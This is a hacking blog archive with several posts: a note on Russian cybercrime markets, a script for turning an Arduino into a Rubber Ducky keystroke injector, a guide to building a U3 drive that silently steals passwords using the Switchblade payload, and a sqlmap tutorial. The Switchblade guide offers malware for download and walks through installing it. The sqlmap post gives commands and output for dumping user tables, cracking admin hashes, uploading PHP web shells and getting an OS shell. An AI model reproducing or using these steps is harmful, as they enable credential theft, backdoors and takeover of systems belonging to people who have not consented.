Category Archives: hacking

A Study On Russian Cyber Crime

As we all know a lot of the crime that happens on the internet originates in Russia. Mostly because of Russia’s rather relaxed approach to enforcing any laws on internet interactions. With the relative lack of control over what goes on on the internet in Russia, a large underground network for cyber criminals has developed. They sell some perfectly normally things VPN’s, bullet proof VPS’s as well as dedicated servers. But what is also on the market are things like Botnets, DDOS attacks, root kits and some other pretty sketchy stuff.

Reading about it is rather interesting you begin to see how you could relativity cheaply DDOS anyone you want or even have custom made rootkits made specially for you. It kind of scares me that if I was to make someone mad how easy it would be for them to screw up my life. As long as they know where to look.

If you interested in learning more about how this Russian cyber crime works, Trend Micro has a great white paper on the subject. if you don’t want to find it on the site you can just download it.

Installing USB Rubber Ducky On 3rd Party Devices

Earlier I posted some instructions on setting up USB Switchblade. Even though it is a rather outdated piece of software as a few people have pointed out. I also talked about Hack5 releasing a new product called USB Rubber Ducky, the next generation of Switchblade. I will not be buying one because they are rather expensive for such a simple Arduino board and in my opinion it’s not very discreet. But if you wish to invest in one you can order one in the HakShop.

I did some work the other night and I found a tool called the LeoStick a arduino with USB-HID capability. I have have some more good news, seeing as LeoStick  can pretend to be a USB-HID device, it can do the exact same thing Rubber Ducky can do but much cheaper. I happen to have a Arduino-Leonardo laying around (same thing as LeoStick but bigger). So I spent an hour or two writing a quick shell script which can convert ducky script payloads into a sketch suitable for uploading to the LeoStick (or any arduino that has USB-HID capability). The end result is a small bash script which can be downloaded from here.

Usage is fairly simple – you run the script with two options – the first being the payload file, and the second being the arduino script output.

 ./compile_payload lock_prank.txt lock_prank.ino

Various payloads can be found linked from the USB-Rubber-Ducky wiki

Also note that to get this working you need to edit the arduino libraries so that the sendReport function is marked as public.

To to this edit the USBAPI.h file which can be found in ${ARDUINO_DIR}/hardware/arduino/cores/arduino directory.
This may be /usr/share/arduino/hardware/arduino/cores/arduino/USBAPI.h or similar
If you installed the LeoStick board stuff from their website then it will be under your sketches directory as hardware/LeoStick/cores/arduino/USBAPI.h

Open that file and find

private:
    KeyMap* _keyMap;
    void sendReport(KeyReport* keys);
    void setKeyMap(KeyMap* keyMap);
public:
    Keyboard_();
    virtual size_t write(uint8_t);

Then change that to

private:
KeyMap* _keyMap;
void setKeyMap(KeyMap* keyMap);
public:
void sendReport(KeyReport* keys);
Keyboard_();
virtual size_t write(uint8_t);

USB Drives for Penetration Testing

USB Penetration Testing

USB ports are some of the most vulnerable parts of a computer, they exist on desktops, laptops, and servers. Most time they are fully accessible if you have physical access to a machine. Personally getting access to a USB port on a server or even a desktop linked to the target network is a very high priority when I’m pen testing any company. Many times you only need access to a USB port once to gather enough information to compromise a organization.

USB Switcblade / Hacksaw

USB Switchblade is the product of Hak5 and the surrounding community way back in 2006. It has the ability to capture and record information about the computer it is used on, but can also take password hashes, IP information, auto-fill information and some versions of Switchblade can create backdoors in the system for access at a later date.

In order to do this Switchblade uses a U3 drives ability to create a virtual CD-ROM drive allowing autorun to function. It can capture and record password hashes for later cracking. Switchblade can also take browser history (not Chrome history!) and any autofill information on the system. As well product keys for any installed Windows products. Some versions can also create a ghost administrator account for later access. The biggest advantage of using Switchblade is that all this can be done hands free within a few seconds.

USB Rubber Ducky

USB Rubber Ducky is the next generation of Switchblade. It has it’s own code called duckycode for writing plugins for it. You can buy it pre-installed for 59 $. But the source code is also open. I’ll be posting later about how to install it on a 3rd party device. The post is now here. For now though you can check it out on Hak5’s store. Or you can download the source code from github.

USB Keyloggers

I recently wrote an article about USB keyloggers and how a top executive had found a suspicious USB device inserted in between his keyboard and his computer. It turned out that the device was a physical keylogger, and unless you are doing physical inspections of hardware they are nearly undetectable. Of course these types of loggers require that you have access to the target machine on a regular basis to make them useful. They are also rather pricey. But can really change the tide of a pen testing attack.

The Best Option

I use USB Hacksaw/ Switchblade depending on the kind of attack I am preforming. It is by far the cheapest option and can give you tons of very valuable intel as well as a discreetly installed backdoor with Switchblade.

Setting Up USB Switchblade

Picking a USB drive

I will be setting switch blade up on a U3 drive because they have the ability to emulate a CD drive and automatically executed the Switchblade payload without any interaction other than plugging it in. Potentially allowing you to attack a locked computer.

These are the drives I will use to setup on. Two very unassuming drives that will draw little attention plugged into a target machine. But also with enough space to take a lot of information from several different computers.

Installing on the Drive

I’ve put together a package of all the required information for you to download. Switchblade is no longer being maintained and is very difficult to find on the internet. Before you start download that package at the bottom of the page.

Once you download it unzip it all follow the instructions exactly.

1. Unzip the NarwhaleUSB package you downloaded.

2.  Open the Switchblade folder.

3. Unzip the Universal Customizer to “C:\Universal_Customizer

4. Unzip the -=GonZor=- Payload V2.1 to “C:\Payload

5. Copy the file U3CUSTOM.ISO from C:\Payload to C:\Universal_Customizer\BIN replacing the old one.

6. Run C:\Universal_Customizer\Universal_Customizer.exe and plug in U3 smart drive.
– Select Accept and click Next.
– Close all U3 applications and any applications that access your U3 drive and click Next.
– Set a password for the backup zip file (Empty password not allowed)
– Click Next and it will start backing up data. Wait for the Universal Customizer to modify your CD partition and replace your files to the flash drive.
– The modification should now be complete, Unplug your U3 Drive and plug it back in

7. Copy “C:\Payload\SBConfig.exe” to the mass storage of the flash drive

8. Run SBConfig.exe from flash drive

– Select the check boxes of the Payload options you would like to use
– Enter your email address and password for the HackSaw if you wish to use it.
– Click “Update Config” button, a message box should appear to confirm this is completed
– Toggle between using the payload or not by clicking the “Turn PL On”/”Turn PL Off” button
– Toggle between using the U3 Launcher or not by clicking the “Turn U3 Launchpad On”/”Turn U3 Launchpad Off” button

9. You now have -=GonZor=- Payload V2.1 in your U3 smart drive which can automatically steal password once it is plugged in to a computer with administrative privileges.

I’ve tested it and it’s very scary because when I plugged in the hacked U3 smart drive with USB Switchblade payload, the payload ran silently and invisibly! It did not modify any system settings nor sent any network traffic. There is a log file created at F:\System\Logs\COMPUTERNAME (F: drive is the storage drive) by the payload and I am shocked to see that my network configurations, router password, Windows Live Messenger password, Google Talk password, Gmail password, all Firefox passwords, Internet Explorer passwords, ICQ password, Windows Product Keys and etc being recorded in that log file!

As you can see from this guide USB drives can be very dangerous when network security is involved. I recommend securing all servers inside locked racks and regularly inspecting workstations as well as private and company laptops. Basically any computer that may connect to the network you are attempting to secure. Have any tips for securing USB ports or any tool you use for making your drives dangerous? Tell us in the comments.

Downloads

NarwhalUSB Package – When you download it will show up as a virus. Because thats what it is.

Hacking With SQLMap | A Beginners Guide

Sqlmap is one of the most popular and powerful sql injection automation tool out there. Get it from http://sqlmap.org/. In this tutorial we are going to learn how to use sqlmap to exploit a vulnerable web application and see what all can be done with such a tool.

For the list of options and parameters that can be used with the sqlmap command, check the following url
https://github.com/sqlmapproject/sqlmap/wiki/Usage

To understand this tutorial you should have a thorough understanding of how database driven web applications work. For example those made with php+mysql.

URLS

Lets say you have a url like this

 

and that it is prone to sql injection because the developer of that site did not properly escape the parameter id. This can be simply tested by trying to open the url

 

We just added a single quote in the parameter. If this url throws an error then it is clear that the database has reacted with an error because it got an unexpected single quote.

Hacking with SQLMap

Now its time to move on to sqlmap to hack such urls. The sqlmap command is run from the terminal with the python interpreter.

The above is the first and most simple command to run with the sqlmap tool. It will check the url and try to discover basic information about the system. The output can look something like this

[*] starting at 12:10:33[12:10:33] [INFO] resuming back-end DBMS ‘mysql’
[12:10:34] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based – WHERE or HAVING clause
Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

[12:10:37] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5

So the sqlmap tool has discovered the Operating system, web server and database along with version information. Even this much is pretty impressive. But its time to move on and see what more is this tool capable of.

Discover Databases

In this step sqlmap shall be used to find out what databases exist on the target system. Again the command is very simple

$ python sqlmap.py -u “http://www.sitemap.com/section.php?id=51” –dbs

The output could be something like this

[*] starting at 12:12:56[12:12:56] [INFO] resuming back-end DBMS ‘mysql’
[12:12:57] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based – WHERE or HAVING clause
Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

[12:13:00] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[12:13:00] [INFO] fetching database names
[12:13:00] [INFO] the SQL query used returns 2 entries
[12:13:00] [INFO] resumed: information_schema
[12:13:00] [INFO] resumed: safecosmetics
available databases [2]:
[*] information_schema
[*] safecosmetics

This time the output contains the available databases list. Move on…

Find tables in the database

Now its time to find out what tables exist in a particular database. Lets say the database of interest over here is ‘safecosmetics’

Command

$ python sqlmap.py -u “http://www.site.com/section.php?id=51” –tables -D safecosmetics

and the output can be something similar to this

[11:55:18] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[11:55:18] [INFO] fetching tables for database: ‘safecosmetics’
[11:55:19] [INFO] heuristics detected web page charset ‘ascii’
[11:55:19] [INFO] the SQL query used returns 216 entries
[11:55:20] [INFO] retrieved: acl_acl
[11:55:21] [INFO] retrieved: acl_acl_sections
[11:55:22] [INFO] retrieved: acl_acl_seq
[11:55:24] [INFO] retrieved: acl_aco
[11:55:25] [INFO] retrieved: acl_aco_map
[11:55:26] [INFO] retrieved: acl_aco_sections
[11:55:28] [INFO] retrieved: acl_aco_sections_seq
………..

isnt this amazing ? it if ofcourse. Lets get the columns of a particular table now.

Get columns of a table

Now that we have the list of tables with us, it would be a good idea to get the columns of some important table. Lets say the table is ‘users’ and it contains the username and password.

$ python sqlmap.py -u “http://www.site.com/section.php?id=51” –columns -D safecosmetics -T users

The output can be something like this

[12:17:39] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[12:17:39] [INFO] fetching columns for table 'users' in database 'safecosmetics'
[12:17:41] [INFO] heuristics detected web page charset 'ascii'
[12:17:41] [INFO] the SQL query used returns 8 entries
[12:17:42] [INFO] retrieved: id
[12:17:43] [INFO] retrieved: int(11)                                                                                         
[12:17:45] [INFO] retrieved: name                                                                                            
[12:17:46] [INFO] retrieved: text                                                                                            
[12:17:47] [INFO] retrieved: password                                                                                        
[12:17:48] [INFO] retrieved: text                                                                                            
[12:17:49] [INFO] retrieved: permission                                                                                      
[12:17:51] [INFO] retrieved: tinyint(4)                                                                                      
[12:17:52] [INFO] retrieved: email                                                                                           
[12:17:53] [INFO] retrieved: text                                                                                            
[12:17:54] [INFO] retrieved: system_home                                                                                     
[12:17:55] [INFO] retrieved: text
[12:17:57] [INFO] retrieved: system_allow_only
[12:17:58] [INFO] retrieved: text
[12:17:59] [INFO] retrieved: hash
[12:18:01] [INFO] retrieved: varchar(128)
Database: safecosmetics
Table: users
[8 columns]
+-------------------+--------------+
| Column            | Type         |
+-------------------+--------------+
| email             | text         |
| hash              | varchar(128) |
| id                | int(11)      |
| name              | text         |
| password          | text         |
| permission        | tinyint(4)   |
| system_allow_only | text         |
| system_home       | text         |
+-------------------+--------------+

So now the columns are clearly visible. Good job!

Get data of the table

Now comes the most interesting part, of extracting the data from the table. The command would be

$ python sqlmap.py -u “http://www.site.com/section.php?id=51” –dump -D safecosmetics -T users

The above command will simply dump the data of the particular table, very much like the mysqldump command.
The output might look similar to this

+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
| id | hash               | name      | email     | password | permission | system_home | system_allow_only |
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
| 1  | 5DIpzzDHFOwnCvPonu | admin     | <blank>   | <blank>  | 3          | <blank>     | <blank>           |
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+

The hash column seems to have the password hash. Try cracking the hash and then you would get the login details rightaway. sqlmap will create a csv file containing the dump data for easy analysis.

What Next ?

Execute arbitrary Sql command on the server

This is probably the easiest thing to do on a server that is vulnerable to sql injection. The –sql-query parameter can be used to specify a sql query to execute. Things of interest would be to create a user in the users table or something similar. Or may be change/modify the content of cms pages etc.

Another paramter –sql-shell would give an sql shell like interface to run queries interactively.

Get inside the admin panel and play

If the website is running somekind of custom cms or something similar that has an admin panel, then it might be possible to get inside provided you are able to crack the password retrieved in the database dump. Simple and short length passwords can be broken simply by bruteforcing, however long length complex passwords may not be breakable.

Check if the admin panel allows to upload some files. If an arbitrary php file can be uploaded then it be a lot greater fun. The php file can contain shell_exec, system ,exec or passthru function calls and that will allow to execute arbitary system commands. Php web shell scripts can be uploaded to do the same thing.

Shell on remote OS

This is the thing to do to completely takeover the server. However note that it is not as easy and trivial as the tricks shown above. sqlmap comes with a parameter call –os-shell that can be used to try to get a shell on remote system, but it has many limitations of its own.

According to the sqlmap manual

It is possible to run arbitrary commands on the database server’s underlying operating system when the back-end database management system is either MySQL, PostgreSQL or Microsoft SQL Server, and the session user has the needed privileges to abuse database specific functionalities and architectural weaknesses.

The most important privilege needed by the current database user is to write files through the database functions. This is absent in most cases. Hence this technique will not work in most cases.

Note

1. Sometimes sqlmap is unable to connect to the url at all. This is visible when it gets stuck at the first task of “testing connection to the target url”. In such cases its helpful to use the “–random-agent” option. This makes sqlmap to use a valid user agent signature like the ones send by a browser like chrome or firefox.

2. For urls that are not in the form of param=value sqlmap cannot automatically know where to inject. For example mvc urls like http://www.site.com/class_name/method/43/80.

In such cases sqlmap needs to be told the injection point marked by a *

http://www.site.com/class_name/method/43*/80

The above will tell sqlmap to inject at the point marked by *